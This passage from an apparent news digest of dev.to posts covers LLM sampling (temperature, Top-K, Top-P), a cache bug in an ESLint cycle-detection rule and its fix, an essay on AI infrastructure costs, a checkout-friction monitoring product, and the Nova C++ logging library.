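    // Assumption: a temperature of exactly 0 is handled separately (pick the top candidate).
    throw new Error("temperature must be positive");
  }
  const scaled = logits.map((logit) => logit / temperature);
  const max = Math.max(...scaled); // subtract the max for numerical stability
  const exps = scaled.map((value) => Math.exp(value - max));
  const total = exps.reduce((sum, value) => sum + value, 0);
  return exps.map((value) => value / total);
}

const sampleLogits = [2, 1, 0]; // made-up scores for three candidate tokens
console.log(softmaxWithTemperature(sampleLogits, 0.2)); // sharply favors the first token
console.log(softmaxWithTemperature(sampleLogits, 1.0)); // spreads probability more evenly
```

With a low temperature almost all probability lands on the top candidate, which is why the output feels more predictable; with a higher temperature, less likely candidates get a real chance of being sampled.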
2. Top-K
K is the number of highest-scoring candidate tokens the model is allowed to choose from. For the prompt "The cat sat on the ----", the predicted words vary with the value of K.
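A minimal sketch of Top-K filtering: keep the K most probable candidates and renormalize their probabilities so they sum to 1. The candidate words and probabilities are made up for the "The cat sat on the ----" prompt, and `topK` is a hypothetical helper, not a library function.

```typescript
type TokenProb = { token: string; prob: number };

// Hypothetical helper: keep the k most probable candidates and renormalize.
function topK(candidates: TokenProb[], k: number): TokenProb[] {
  const kept = candidates
    .slice() // copy so the caller's array is not reordered
    .sort((a, b) => b.prob - a.prob)
    .slice(0, k);
  const total = kept.reduce((sum, c) => sum + c.prob, 0);
  return kept.map((c) => ({ token: c.token, prob: c.prob / total }));
}

// Made-up probabilities for illustration only.
const nextWords: TokenProb[] = [
  { token: "mat", prob: 0.5 },
  { token: "sofa", prob: 0.25 },
  { token: "floor", prob: 0.15 },
  { token: "roof", prob: 0.1 },
];

console.log(topK(nextWords, 1).map((c) => c.token)); // only the single best candidate
console.log(topK(nextWords, 3).map((c) => c.token)); // the three best candidates
```

With K = 1 this reduces to always picking the top candidate; larger K leaves more room for variety.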
3. Top-P
A probability threshold is set. From the predicted words, taken in order of decreasing probability, the smallest set whose cumulative probability reaches the threshold is kept.
Example: the prompt "The cat" with top_p = 0.7.
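Top-P (also called nucleus sampling) can be sketched as: sort candidates by probability, then keep adding them until the running total reaches the threshold. The candidates below are invented for the "The cat" prompt, and `topP` is a hypothetical helper written for this illustration.

```typescript
type Candidate = { token: string; prob: number };

// Hypothetical helper: keep the smallest set of top candidates whose
// cumulative probability reaches the threshold p.
function topP(candidates: Candidate[], p: number): Candidate[] {
  const sorted = candidates.slice().sort((a, b) => b.prob - a.prob);
  const kept: Candidate[] = [];
  let cumulative = 0;
  for (const candidate of sorted) {
    kept.push(candidate);
    cumulative += candidate.prob;
    if (cumulative >= p) break; // threshold reached, stop adding candidates
  }
  return kept;
}

// Made-up probabilities for illustration only.
const afterTheCat: Candidate[] = [
  { token: "sat", prob: 0.5 },
  { token: "ran", prob: 0.25 },
  { token: "slept", prob: 0.15 },
  { token: "flew", prob: 0.1 },
];

console.log(topP(afterTheCat, 0.7).map((c) => c.token));
```

Unlike Top-K, the number of surviving candidates is not fixed: a confident model may keep one or two words, an uncertain one many more.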

---
## no-cycle finds 0 cycles in next.js (and other lies caches tell you)

> Published: 2026-05-24 03:07:43+00:00
> Source: https://dev.to/ofri-peretz/no-cycle-finds-0-cycles-in-nextjs-and-other-lies-caches-tell-you-3ld8
> wpnews: https://wpnews.pro/news/no-cycle-finds-0-cycles-in-next-js-and-other-lies-caches-tell-you

The article describes a bug in a cycle-detection algorithm used in an ESLint plugin for Next.js, where a depth limit in the DFS search caused files to be incorrectly cached as "acyclic" when the search was truncated before finding a cycle. This caching bug cascaded across thousands of files, causing the tool to report zero cycles in a large codebase (14,556 files) while smaller scopes and a different tool (oxlint) correctly found 17 cycles. The fix involves tracking whether the DFS was truncated by the depth limit and only caching files as acyclic when the search fully completes without finding a cycle.

We benchmark `import-next/no-cycle` against `eslint-plugin-import/no-cycle` and oxlint's native Rust port on next.js (131K stars, 14,556 source files). The two ESLint plugins agreed: **0 cycles found**. oxlint disagreed: **17 cycles found**.

We trusted the consensus. Then we tested our own rule on a 33-file subset of the same repo (`packages/next/src/client/components/router-reducer/**`). It found **5+ cycles immediately**.

Same rule. Same config. Same files. Different scope. Different answers.

The bug was 60 lines deep in the cache layer — and it explains why the wider scope returned silence.

## The setup that hides the bug

DFS-based cycle detection usually has the same shape:

1. For each file F in the lint scope
2. Run a depth-bounded DFS over its import graph
3. If DFS returns to F → found a cycle
4. Else → F is acyclic, remember that for next time

Step 4 is where caching pays off. With N files and average graph depth D, naive cycle detection is O(N²·D). With a "known acyclic" cache, repeat visits are O(1). On real codebases the cache hit rate is 70%+ — without it the rule gets too slow to run in CI.

The shape of the cache:

```
interface FileSystemCache {
  // ...
  nonCyclicFiles: Set<string>; // files known not to be in any cycle
}
```

And the use site:

```
function dfs(file: string, depth: number, visited: Set<string>) {
  if (file === sourceFile) {
    allCycles.push([...pathStack, file]);
    return;
  }
  if (depth >= maxDepth) return; // <-- early return on depth limit
  if (visited.has(file)) return;
  if (cache.nonCyclicFiles.has(file)) return;
  // ... recurse into imports
}

dfs(targetFile, 1, new Set());
if (allCycles.length === 0) {
  cache.nonCyclicFiles.add(targetFile); // <-- cache the result
}
```

Spot the bug? It's between those two `// <--` lines.

## Why the cache poisons itself

When the DFS hits `depth >= maxDepth`, it returns *as if it had completed exploration without finding a cycle*. The caller can't tell the difference between "I explored everything and found nothing" and "I gave up at depth 10."

So a file whose only cycle is at depth 12 (where 12 > maxDepth=10) gets:

- DFS truncated at depth 10
- `allCycles.length === 0`
- `cache.nonCyclicFiles.add(targetFile)`: incorrectly marked as known-acyclic

Now any future DFS that traverses through that file short-circuits because of `if (cache.nonCyclicFiles.has(file)) return;`. The poisoning cascades: every file in the same SCC subtree gets marked acyclic by association.

In a small lint scope, you don't see the cascade — there aren't enough files for one bad cache entry to mask the others. In a 14K-file scope, one early miss-then-cache wipes out the whole cluster.

## The narrow-vs-wide scope smoking gun

Here's the test that proved it. Same rule, same config, same `--no-cache` flag (so ESLint doesn't cache between runs, but our in-process cache is still active for the duration of the run):

``` bash
# Wide scope: 2,363 files, includes everything in packages/
$ eslint --config flagship.config.mjs 'packages/**/*.{ts,tsx,js}'
# 0 import-next/no-cycle findings

# Narrow scope: 33 files, just the router-reducer directory
$ eslint --config flagship.config.mjs 'packages/next/src/client/components/router-reducer/**/*.ts'
# 5+ import-next/no-cycle findings
```

The narrow run finds cycles. The wide run also starts from a fresh process with a fresh cache, but ESLint lints files in some order, and as it processes the 2,363 files, it builds up the `nonCyclicFiles` cache. By the time the lint pass reaches files that *do* belong to cycles, those files have been falsely marked acyclic via cascade.

oxlint, being a different process with its own implementation, doesn't share our cache. It uses oxlint's own `ModuleGraphVisitorBuilder` and finds 17 cycles.

## The fix

Track whether the DFS was truncated, and don't cache truncated runs:

``` ts
let depthLimitHit = false;

function dfs(file: string, depth: number, visited: Set<string>) {
  if (file === sourceFile) {
    allCycles.push([...pathStack, file]);
    return;
  }
  if (depth >= maxDepth) {
    depthLimitHit = true; // <-- record the truncation
    return;
  }
  // ... rest unchanged
}

dfs(targetFile, 1, new Set());

// Only cache as acyclic when DFS COMPLETED and found nothing.
// A depth-truncated DFS isn't proof of acyclicity.
if (allCycles.length === 0 && !depthLimitHit) {
  cache.nonCyclicFiles.add(targetFile);
}
```

Five lines. Re-running on next.js: **0 → 245 unique files in cycles, 914 unique (file, line) pairs**. The wide-scope correctness now matches the narrow-scope correctness.

## What `eslint-plugin-import` does instead

When you've found a real bug, it's worth checking how peers in the same landscape modeled the problem. The long-standing `eslint-plugin-import/no-cycle` rule uses a fundamentally different approach:

``` js
// from eslint-plugin-import/src/rules/no-cycle.js:73
const scc = options.disableScc
  ? {}
  : StronglyConnectedComponentsBuilder.get(myPath, context);

// ...

// If we're in different SCCs, we can't have a circular dependency
const hasDependencyCycle =
  options.disableScc || scc[myPath] === scc[imported.path];
if (!hasDependencyCycle) return;
```

They build a strongly-connected-components graph **once per lint run**, then per-file the cycle check is O(1) — *"are these two files in the same SCC?"*. The SCC graph itself is computed in O(V+E) using Tarjan's algorithm.

This sidesteps the depth-limit problem entirely. SCCs are an exact answer to "what are the cycle clusters?": there's no truncation, no approximation, no cache to poison. They cache the SCC result module-wide and clear it on `Program:exit`.
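To make the SCC idea concrete, here is a small, self-contained sketch of Tarjan's algorithm over an import graph. It is not `eslint-plugin-import`'s actual code; the function names, the `Map`-based graph shape, and the sample file names are assumptions made for this illustration.

```typescript
// Assumed graph shape: file path -> list of imported file paths.
type ImportGraph = Map<string, string[]>;

// Tarjan's algorithm: returns a map from file to its SCC id, in O(V + E).
function stronglyConnectedComponents(graph: ImportGraph): Map<string, number> {
  const index = new Map<string, number>();
  const lowlink = new Map<string, number>();
  const onStack = new Set<string>();
  const stack: string[] = [];
  const component = new Map<string, number>();
  let nextIndex = 0;
  let nextComponent = 0;

  function visit(node: string): void {
    index.set(node, nextIndex);
    lowlink.set(node, nextIndex);
    nextIndex++;
    stack.push(node);
    onStack.add(node);

    for (const next of graph.get(node) || []) {
      if (!index.has(next)) {
        visit(next);
        lowlink.set(node, Math.min(lowlink.get(node)!, lowlink.get(next)!));
      } else if (onStack.has(next)) {
        lowlink.set(node, Math.min(lowlink.get(node)!, index.get(next)!));
      }
    }

    // node is the root of an SCC: pop its members off the stack.
    if (lowlink.get(node) === index.get(node)) {
      let member = "";
      do {
        member = stack.pop()!;
        onStack.delete(member);
        component.set(member, nextComponent);
      } while (member !== node);
      nextComponent++;
    }
  }

  graph.forEach((_imports, node) => {
    if (!index.has(node)) visit(node);
  });
  return component;
}

// O(1) check per import edge: an import can only close a cycle
// if both files sit in the same SCC.
function inSameScc(components: Map<string, number>, a: string, b: string): boolean {
  const id = components.get(a);
  return id !== undefined && id === components.get(b);
}

// Hypothetical graph: a -> b -> c -> a is a cycle, d is a leaf.
const demoGraph: ImportGraph = new Map([
  ["a.ts", ["b.ts"]],
  ["b.ts", ["c.ts"]],
  ["c.ts", ["a.ts", "d.ts"]],
  ["d.ts", []],
]);
const demoComponents = stronglyConnectedComponents(demoGraph);
console.log(inSameScc(demoComponents, "a.ts", "c.ts"));
console.log(inSameScc(demoComponents, "c.ts", "d.ts"));
```

The recursive form is the easiest to read; on very deep import graphs an iterative version would avoid call-stack limits.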

oxlint goes further: it builds an explicit module graph during parsing, then the cycle visitor runs against that graph directly. No need for SCC because the graph is already structured.

Both approaches share a property our DFS-with-cache approach lacks: **the algorithm is exact, not approximate**. A cache should trade memory for compute without changing the answer; ours accidentally traded correctness for speed.

## What I'd do differently next time

Three takeaways from the diagnosis:

**Caches should never lie.** A cache entry should only encode information you've *proven*, not information you've *failed to disprove*. Our `nonCyclicFiles` cache encoded "DFS found no cycle" as "no cycle exists." Those aren't the same statement.

**Test the algorithm at the same scope you'll deploy at.** Our unit tests passed because the test fixtures are small and depth-bounded. The bug only surfaces at 2K+ files where the cache fills up enough for cascades to start. We need a stress test that mirrors production.

**An exact algorithm sidesteps a class of bugs that caches can introduce.** SCC-based cycle detection (eslint-plugin-import) and module-graph walking (oxlint) avoid the depth-limit interaction by construction. We hold our DFS approach for a reason — incremental analysis benefits from per-file caching — but the depth-limit + cache interaction is exactly the kind of bug the SCC approach can't have. Worth re-evaluating whether incrementality is worth that trade.
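One way to make the first takeaway structural is to have the search return a three-way verdict, so that "gave up" can never be mistaken for "proved acyclic". The sketch below is a simplified stand-in, not the code in `dependency-analysis.ts`; the names `Verdict`, `checkFile`, and `recordVerdict` are hypothetical, and the DFS here does not consult the cache at all.

```typescript
type Graph = Map<string, string[]>;
type Verdict = "cycle" | "acyclic" | "truncated";

// Depth-bounded DFS that reports whether it was cut short.
function checkFile(graph: Graph, source: string, maxDepth: number): Verdict {
  const visited = new Set<string>();
  let found = false;
  let truncated = false;

  function dfs(file: string, depth: number): void {
    if (found) return;
    if (depth > 0 && file === source) {
      found = true; // returned to the starting file: a cycle exists
      return;
    }
    if (depth >= maxDepth) {
      truncated = true; // gave up here: absence of a cycle is NOT proven
      return;
    }
    if (visited.has(file)) return;
    visited.add(file);
    for (const next of graph.get(file) || []) dfs(next, depth + 1);
  }

  dfs(source, 0);
  if (found) return "cycle";
  return truncated ? "truncated" : "acyclic";
}

// Only a completed, cycle-free search may populate the cache.
function recordVerdict(cache: Set<string>, file: string, verdict: Verdict): void {
  if (verdict === "acyclic") cache.add(file);
}

// Hypothetical 12-file ring: f0 -> f1 -> ... -> f11 -> f0.
const ring: Graph = new Map();
for (let i = 0; i < 12; i++) ring.set("f" + i, ["f" + ((i + 1) % 12)]);

const nonCyclicFiles = new Set<string>();
const verdict = checkFile(ring, "f0", 10);
recordVerdict(nonCyclicFiles, "f0", verdict);
console.log(verdict, nonCyclicFiles.has("f0"));
```

With a depth limit of 10 the 12-file ring comes back as `"truncated"` and stays out of the cache; raising the limit past the ring length yields `"cycle"`.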

The fix is in [packages/eslint-devkit/src/resolver/dependency-analysis.ts](https://github.com/ofri-peretz/eslint/blob/main/packages/eslint-devkit/src/resolver/dependency-analysis.ts). The bench that exposed it is [benchmarks/suites/ilb-flagship](https://github.com/ofri-peretz/eslint/tree/main/benchmarks/suites/ilb-flagship).

This is one of three rule bugs caught by the same bench sweep. The companion writeups: [What ground truth caught that unit tests missed](https://ofriperetz.dev/articles/what-ground-truth-caught-that-unit-tests-missed) (the smoke-gate piece) and [When entropy isn't enough](https://ofriperetz.dev/articles/no-hardcoded-credentials-entropy-isnt-enough) (807 false credential findings on vercel/ai).

## 📊 About the author

I'm Ofri Peretz, building the Interlace ESLint ecosystem — a JavaScript static-analysis catalog that runs under ESLint and Oxlint with CI-enforced parity.

---
## Google I/O 2026 Wasn’t About AI Models — It Was About Infrastructure

> Published: 2026-05-24 03:02:49+00:00
> Source: https://dev.to/surfiniaburger/google-io-2026-wasnt-about-ai-models-it-was-about-infrastructure-53me
> wpnews: https://wpnews.pro/news/google-i-o-2026-wasnt-about-ai-models-it-was-about-infrastructure

According to the article, Google I/O 2026 focused less on AI models and more on the massive physical infrastructure required to run them, highlighting the immense energy and water consumption behind AI processing. The author notes that the event revealed how intelligence is becoming infrastructure, with every prompt carrying a physical cost, such as enough energy to power nearly 3 million light bulbs for a year. The article concludes that the defining tradeoff of this era will be balancing AI's productivity gains against the real-world costs of sustaining its physical consumption.

This is a submission for the Google I/O Writing Challenge
I actually appointed myself as AGI Police some days back, on account of the number of times I've found myself sipping an AI slop milkshake.
As a reformed individual (with regulated slop intake), I keep listening to Yann LeCun's insights through several notable podcasts. He constantly reminds us that “LLMs in general cannot predict the consequences of their actions.”
Google I/O 2026 made an impact, with lots of exciting announcements. Training across the largest clusters in the world. Over 7x more tokens processed every month. Bigger infrastructure. Faster inference. More intelligence delivered instantly to billions of people.
But somewhere in the middle of all the demos and applause, I found myself thinking less about the models and more about the machinery underneath them.
So I asked Google AI Mode to help calculate the energy consumption behind large-scale token processing and compare it to something human-sized.
Here is what we found out in less than 30 seconds of processing.
We could power nearly 3 million light bulbs continuously, 24 hours a day, for an entire year. Let that sink in.
What struck me wasn’t just the raw number itself. It was the inversion of intuition.
AI feels weightless.
You type words into a chat box and receive intelligence back in seconds. No smoke. No factory floor. No visible machinery. Just text appearing instantly on a glowing rectangle in your hand.
But underneath that interface sits an industrial system consuming electricity, water, cooling infrastructure, and global semiconductor supply chains at unprecedented scale.
Before I looked away, Gemini made another suggestion that made me even more curious. It suggested comparing the energy consumption with Nvidia infrastructure and also estimating the amount of water required to cool the servers powering the inference workloads.
I indulged.
And in less than 5 seconds (which means I was exaggerating when I said 30 seconds earlier), this happened:
457 million litres matches the total annual water footprint of roughly 1,200 average households.
At that point, the conversation stopped feeling like a fun experiment and started feeling like a glimpse into the physical economics of intelligence itself.
The real takeaway from Google I/O wasn’t simply that models are getting smarter.
It was that intelligence is becoming infrastructure.
Every prompt now has a physical cost attached to it:
And the strange part is that users rarely see any of it.
What fascinated me most was how Gemini framed the answers. Instead of treating the numbers like an alarming revelation, it immediately contextualized them against broader industry infrastructure. The response was technically useful, but it also revealed something subtle about AI systems: they do not merely answer questions; they shape how scale is emotionally interpreted.
The answer, although accurate, still felt slightly biased — almost like the system instinctively softened the psychological impact of the numbers by normalizing them within the broader AI race.
And honestly, I understand why.
Because the benefit of knowledge being delivered at our fingertips is genuinely incredible.
A student can learn quantum mechanics from a village with weak infrastructure. A founder can prototype an idea in hours instead of months. A developer can debug systems faster than ever before. The productivity gains are real.
But so is the cost.
For years, software scaled mostly through abstraction. AI may be the first mainstream computing paradigm where scaling intelligence also means scaling physical consumption in the real world.
That may ultimately become the defining tradeoff of this era.
The question after Google I/O is no longer just:
“How intelligent can these systems become?”
But also:
“What will it cost to sustain them?”

---
## Hermes Agent vs Openclaw

> Published: 2026-05-24 02:58:43+00:00
> Source: https://dev.to/wanjohichristopher/hermes-vs-openclaw-2j4d
> wpnews: https://wpnews.pro/news/hermes-agent-vs-openclaw

In 2026, Hermes and OpenClaw are the two most-starred open-source AI agent frameworks on GitHub. A comparison article by WanjohiChristopher analyzes their features, performance, and community support to help developers choose between them.

Hermes vs OpenClaw: The Two Most-Starred AI Agent Frameworks of 2026
By WanjohiChristopher (May 22, 6 min read). Tags: #ai #agents #opensource #comparison

---
## Your Checkout Is Probably Leaking Revenue. The Problem Is You Cannot See Where.

> Published: 2026-05-24 02:57:46+00:00
> Source: https://dev.to/xiden001/your-checkout-is-probably-leaking-revenue-the-problem-is-you-cannot-see-where-26kh
> wpnews: https://wpnews.pro/news/your-checkout-is-probably-leaking-revenue-the-problem-is-you-cannot-see-where

Based solely on the provided text, the article explains that most ecommerce teams know when checkout conversion drops but not why, as standard analytics only show where users leave, not the specific reasons for their hesitation or abandonment. It argues that checkout is a complex interaction surface where small technical issues like field errors or slow widgets create costly friction, and that teams need a diagnostic layer to identify these specific problems. The author introduces a tool called Checkout Friction Detector, which monitors behavioral patterns like dead clicks and validation failures to provide actionable alerts without recording user sessions.

Most ecommerce teams know when checkout conversion is down.
Very few know why.
That gap is expensive.
You can have strong traffic, good product pages, healthy add-to-cart rates, and a polished brand experience, then still lose a meaningful percentage of buyers during the final few steps.
The worst part is that the usual analytics stack often tells you only that people dropped off, not what made them hesitate, rage click, retry a field, abandon a step, or give up completely.
For business owners, this is a revenue problem.
For engineers, this is an observability problem.
And for ecommerce teams, it is one of the most overlooked places where small technical issues quietly become real commercial losses.
It is easy to think of checkout as a simple sequence:
In reality, checkout is a dense interaction surface.
Every field, button, validation rule, third-party widget, browser autofill behavior, payment provider, shipping condition, discount code, and loading state can affect whether the customer completes the purchase.
A buyer may abandon because:
None of these issues necessarily look dramatic in a dashboard.
But they add up.
A checkout does not need to be broken to lose money. It only needs to create enough friction for a motivated buyer to pause, doubt, or leave.
Most ecommerce teams already have some analytics installed.
They can usually answer questions like:
Those are useful questions, but they are not enough.
Knowing that users dropped off between shipping and payment does not tell you whether they struggled with the postal code field, got stuck on shipping rates, rage-clicked a disabled continue button, or abandoned after a payment widget failed to load.
Traditional analytics often gives you the map.
What teams need is the diagnostic layer.
That means understanding the actual interaction signals inside checkout:
This is the difference between observing a funnel and understanding user friction.
Session replay tools can be helpful. I have used them. Many teams do.
But they also introduce a practical problem: someone has to watch the recordings.
That does not scale well.
For an ecommerce founder, watching dozens of sessions is not a good use of time.
For a CRO specialist, it can become a noisy manual review process.
For engineers, it often lacks the structured event data needed to reproduce and prioritize issues efficiently.
There is also the privacy angle. Many brands, especially those selling in Europe or handling sensitive customer flows, are cautious about recording user sessions. Even when tools mask input values, the perception and compliance burden can still be a concern.
Checkout needs something more focused.
Not another dashboard.
Not hundreds of recordings.
Not vague aggregate metrics.
It needs a direct signal:
This field caused unusual hesitation.
This button received dead clicks.
This step saw repeated validation failures.
This checkout path started showing abnormal abandonment.
That is the layer I wanted to build.
I built Checkout Friction Detector to help ecommerce teams identify the specific checkout interactions that may be costing them sales.
The idea is simple:
Install one script tag, then receive alerts and reports about checkout friction without recording sessions or collecting personal customer data.
The tool monitors behavioral friction patterns such as:
Instead of asking teams to dig through dashboards or watch recordings, it sends practical summaries that highlight where users are struggling.
For business teams, the value is clarity.
For technical teams, the value is signal.
If you own or operate an ecommerce business, your checkout is one of the highest-leverage parts of your revenue system.
You may already be spending money on:
All of that effort is designed to bring people closer to purchase.
But if checkout creates preventable friction, your acquisition budget is subsidizing lost revenue.
That is what makes checkout optimization so powerful. You are not trying to create demand from scratch. You are improving the path for people who already showed buying intent.
A small checkout improvement can have an outsized impact because it applies near the bottom of the funnel.
The closer a customer is to purchase, the more expensive it is to lose them.
For engineers, checkout friction is often difficult because the symptoms are distributed across frontend behavior, backend validation, third-party services, browser differences, device constraints, and business rules.
A checkout issue might come from:
The support ticket usually says something vague:
“Some customers are having trouble checking out.”
That is not enough.
Engineers need better context:
Checkout Friction Detector is designed to expose those signals in a way that is useful for debugging and prioritization.
It does not replace logs, analytics, or error monitoring. It complements them by focusing on user-facing friction inside the checkout experience.
Many checkout issues are not hard failures.
A hard failure is obvious. Payment fails. The page crashes. An API returns an error. A user cannot proceed.
Friction is more subtle.
A user may technically be able to complete checkout, but the experience makes them work too hard.
That is why friction often hides in plain sight.
For example:
None of these necessarily crash the app.
But they can still cost conversions.
This is where interaction-level monitoring becomes valuable.
Checkout is sensitive.
Customers are entering addresses, contact details, payment information, and personal buying intent. That means any analytics tool used in checkout should be careful by design.
My approach with Checkout Friction Detector is simple:
For example, the system does not need to know what a customer typed into a field.
It only needs to know that a field caused repeated edits, hesitation, validation failure, or abandonment.
That distinction matters.
You can learn that a checkout field is causing friction without storing the customer’s private input.
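As a rough illustration of that distinction, the sketch below aggregates friction per field from events that carry only a field name and an event kind, never the typed value. The event shape and the names `FieldEvent` and `summarizeFieldFriction` are assumptions for this example, not Checkout Friction Detector's actual schema.

```typescript
// Assumed event shape: note there is deliberately no "value" property.
type FrictionKind = "edit" | "validation_error";
interface FieldEvent {
  field: string;
  kind: FrictionKind;
}
interface FieldSummary {
  edits: number;
  validationErrors: number;
}

// Hypothetical helper: count edits and validation errors per field.
function summarizeFieldFriction(events: FieldEvent[]): Record<string, FieldSummary> {
  const summary: Record<string, FieldSummary> = {};
  for (const event of events) {
    const entry =
      summary[event.field] || (summary[event.field] = { edits: 0, validationErrors: 0 });
    if (event.kind === "edit") entry.edits++;
    else entry.validationErrors++;
  }
  return summary;
}

// Made-up events for one checkout session.
const sessionEvents: FieldEvent[] = [
  { field: "postal_code", kind: "edit" },
  { field: "postal_code", kind: "validation_error" },
  { field: "postal_code", kind: "edit" },
  { field: "postal_code", kind: "validation_error" },
  { field: "email", kind: "edit" },
];

console.log(summarizeFieldFriction(sessionEvents));
```

The summary is enough to flag `postal_code` as a problem field while containing nothing the customer typed.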
If you are building or optimizing an ecommerce checkout, these are the signals I would pay attention to.
How long do users pause before completing a field?
High hesitation may indicate confusion, poor labeling, unfamiliar requirements, or anxiety about why the information is needed.
This is especially important for fields like:
When users keep changing the same field, something may be unclear.
Repeated edits can point to:
Validation is necessary, but poor validation kills momentum.
Track which fields produce the most errors, when those errors appear, and whether users recover after seeing them.
A validation error that users recover from quickly may be acceptable.
A validation error that leads to abandonment is a serious conversion risk.
Rage clicks usually indicate frustration.
In checkout, they often happen when:
Dead clicks happen when users click elements that do not respond.
This can reveal misleading UI, broken event handlers, confusing design, or missing feedback.
Dead clicks are especially useful because they show where user expectation and product behavior diverge.
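Rage clicks in particular can be approximated from click timestamps alone. The sketch below flags any element that receives several clicks within a short window; the thresholds (3 clicks within 1000 ms), the event shape, and the function name are assumptions chosen for illustration, not values used by any specific tool.

```typescript
// Assumed event shape: an element identifier plus a timestamp in milliseconds.
interface ClickEvent {
  target: string;
  timeMs: number;
}

// Hypothetical helper: return targets that received at least `minClicks`
// clicks within any `windowMs`-long window.
function findRageClicks(clicks: ClickEvent[], minClicks = 3, windowMs = 1000): string[] {
  const byTarget: Record<string, number[]> = {};
  for (const click of clicks) {
    (byTarget[click.target] = byTarget[click.target] || []).push(click.timeMs);
  }

  const flagged: string[] = [];
  for (const target of Object.keys(byTarget)) {
    const times = byTarget[target].sort((a, b) => a - b);
    // Slide over the sorted timestamps, comparing click i with click i + minClicks - 1.
    for (let i = 0; i + minClicks - 1 < times.length; i++) {
      if (times[i + minClicks - 1] - times[i] <= windowMs) {
        flagged.push(target);
        break;
      }
    }
  }
  return flagged;
}

// Made-up clicks: three fast clicks on "continue", two slow ones on "apply-coupon".
const sampleClicks: ClickEvent[] = [
  { target: "continue", timeMs: 0 },
  { target: "continue", timeMs: 200 },
  { target: "apply-coupon", timeMs: 300 },
  { target: "continue", timeMs: 400 },
  { target: "apply-coupon", timeMs: 5300 },
];

console.log(findRageClicks(sampleClicks));
```

Pairing a flagged target with whether the click produced any response would separate rage clicks on a slow button from dead clicks on an element that never reacts.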
Step-level abandonment is not new, but it becomes more useful when combined with interaction data.
Knowing users abandon at the shipping step is useful.
Knowing they abandon at the shipping step after repeated postal code validation failures is actionable.
Imagine your checkout completion rate drops by 8% over two weeks.
Your analytics show that the biggest drop-off is happening between shipping and payment.
That is helpful, but still too broad.
Now imagine you also know:
That is no longer just a conversion issue.
That is a clear investigation path.
A business owner sees the revenue risk.
An engineer sees where to inspect.
A CRO specialist sees what to test.
That is the kind of bridge checkout analytics should create.
The biggest insight for me was that ecommerce checkout problems sit at the intersection of business, UX, and engineering.
They are rarely owned by one function.
Marketing drives the traffic.
Design shapes the experience.
Engineering builds the flow.
Operations define shipping and payment rules.
Support hears the complaints.
Leadership sees the revenue impact.
But the actual friction often lives between all of those teams.
That is why visibility matters.
When checkout issues are vague, teams debate opinions.
When friction is measurable, teams can prioritize.
Checkout Friction Detector is built for:
It is especially useful for teams that want practical checkout insights without adding another heavy analytics dashboard or relying on session recordings.
Ecommerce teams have spent years improving traffic acquisition.
Better ads. Better targeting. Better landing pages. Better email flows. Better personalization.
But the checkout experience is still where intent either turns into revenue or disappears.
That final step deserves better observability.
Not just conversion rates.
Not just recordings.
Not just dashboards.
Actual friction signals.
The kind that tell you where customers are struggling, what changed, and what needs attention.
That is what I am building with Checkout Friction Detector.
The goal is straightforward:
Help ecommerce teams find and fix the checkout friction that quietly costs them sales.
You can check it out here:

---
## Domain-Based C++ Logging With Nova

> Published: 2026-05-24 02:54:53+00:00
> Source: https://dev.to/kleetus_mactavish/domain-based-c-logging-with-nova-o77
> wpnews: https://wpnews.pro/news/domain-based-c-logging-with-nova

Nova is a new C++ logging library that uses compile-time types for logging domains instead of runtime string identifiers or global severity levels, enabling independent per-subsystem configuration and routing. The library includes Flare, an async-signal-safe crash logging component that writes structured records to disk without heap allocation or locks. Benchmarks show Nova performs competitively across realistic workloads, particularly in scenarios requiring deterministic behavior and bounded memory usage.

Repository: https://github.com/kmac-13/nova/
Benchmarks: https://github.com/kmac-13/nova/blob/main/docs/BENCHMARKS.md
I am pleased to announce the initial release of Nova - a modern C++ logging library focused on deterministic behavior, compile-time configurability, and flexible domain-based routing for systems ranging from hosted platforms down to bare-metal and safety-critical environments.
There are already several quality C++ logging libraries available. However, most logging libraries organize routing and filtering around severity levels and rely on global logger configuration or runtime string-based logging categories. Engineers are often forced to encode subsystem behavior into a limited set of severity levels while also considering which thresholds will be enabled in production. This also leads to situations where enabling debug logging for one subsystem effectively requires enabling debug logging across unrelated areas of the application.
Nova instead treats logging domains as compile-time types, allowing logging configuration and routing to directly reflect application structure rather than forcing subsystems into global severity categories.
Domains can represent subsystems, modules, interfaces, classes, libraries, or any other domain-specific concept, and each domain can be independently enabled, disabled, or routed without reliance on shared global configuration. Because domains are independent types rather than shared string identifiers, libraries can define their own logging domains without interfering with application or third-party logging configuration.
Additional goals of the library include:
Nova also includes Flare, an async-signal-safe crash and forensic logging component that writes structured diagnostic records directly to disk from signal handlers - without heap allocation, locks, or non-signal-safe C++ runtime features.

    #include <nova.h>

    // define a domain (can be any type)
    struct MotionPlanner {};

    // configure the domain with a name (MOTION), enabled state (true), and clock type (steadyNanosecs)
    NOVA_LOGGER_TRAITS( MotionPlanner, MOTION, true, kmac::nova::TimestampHelper::steadyNanosecs );

    int main()
    {
        // configure motion planner sink as mpSink
        ...

        // bind the mpSink to the MotionPlanner logging domain
        kmac::nova::ScopedConfigurator config;
        config.bind< MotionPlanner >( &mpSink );

        // log
        NOVA_LOG( MotionPlanner ) << "Planning trajectory...";
    }

Here we can see that the MotionPlanner domain is defined, the traits for the domain are configured, a target sink is bound to the domain, and logging is performed. In this example, the domain is a simple, empty struct, but a domain can be any type, including interface, abstract, or concrete classes. A domain can even be a specific class, and logging can be limited to the scope of that class.
Using types as logging domains enables compile-time routing, strong subsystem separation, and per-domain configuration and enablement. Disabled domains can be eliminated entirely by the compiler, and type names prevent the silent runtime failures that string-based routing can introduce.
Additionally, per-domain control means that enabling verbose logging for one subsystem has no effect on any other - there is no shared severity threshold to raise or lower across the entire application just to see detailed output from a single area.
Nova has been benchmarked against several popular C++ logging libraries, including Quill and spdlog, using:
The benchmarks intentionally normalize queue sizing and backend threading models to avoid structurally advantaging any particular library configuration.
Results varied by workload, but several patterns consistently emerged:
While Nova does not always achieve the highest theoretical front-end enqueue rate, it performed extremely competitively across a broad range of realistic workloads, especially where deterministic behavior and bounded memory usage are important.
Full benchmark methodology and raw benchmark data are available in the repository.
The initial release is now available at the repository linked above. I am still actively working on improving the library with additional features such as:
I would appreciate feedback on any aspects of Nova (e.g. integration experience, cross-platform/compiler issues, feature requests). If you try Nova in a project, I’d love to hear how it performs and where it can improve.
Thanks for reading.

---
## OpenCode Go + Oh My OpenAgent: The Model Routing Config That Actually Saves Money

> Published: 2026-05-24 02:53:03+00:00
> Source: https://dev.to/devansh365/opencode-go-oh-my-openagent-the-model-routing-config-that-actually-saves-money-3jmj
> wpnews: https://wpnews.pro/news/opencode-go-oh-my-openagent-the-model-routing-config-that-actually-saves-money

